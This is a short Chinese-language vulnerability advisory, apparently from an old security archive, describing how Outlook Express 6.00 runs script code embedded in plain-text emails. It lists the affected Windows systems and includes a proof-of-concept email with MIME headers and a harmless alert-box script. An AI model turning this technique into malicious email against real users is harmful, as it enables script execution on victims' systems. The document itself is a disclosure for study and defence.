Outlook Express 6.00 可执行脚本代码漏洞

/ns/ld/softld/data/20010926102936.htm

正常情况下，只有 html 邮件[Content-Type: text/html]才会解析 html 和脚本代码。但是在最新推出的 Outlook Express 6.00 中，纯文本邮件中如果加入了脚本代码，它们也会被解释执行。攻击者有可能利用该漏洞发送一段恶意的代码到受影响的服务器，将可能获得受影响系统中的权限。

缺省情况下，Outlook Express 6.00禁止脚本执行，因此缺省情况下用户不会受此问题影响。


以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负


发送下列的纯文本邮件也会导致执行脚本：

MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Source: 11.09.01 http://www.malware.com

<script>alert("freak");alert("show")</script>

受影响的系统:
Outlook Express 6.00
- Microsoft Windows 9x
- Microsoft Windows NT 4.0
- Microsoft Windows 2000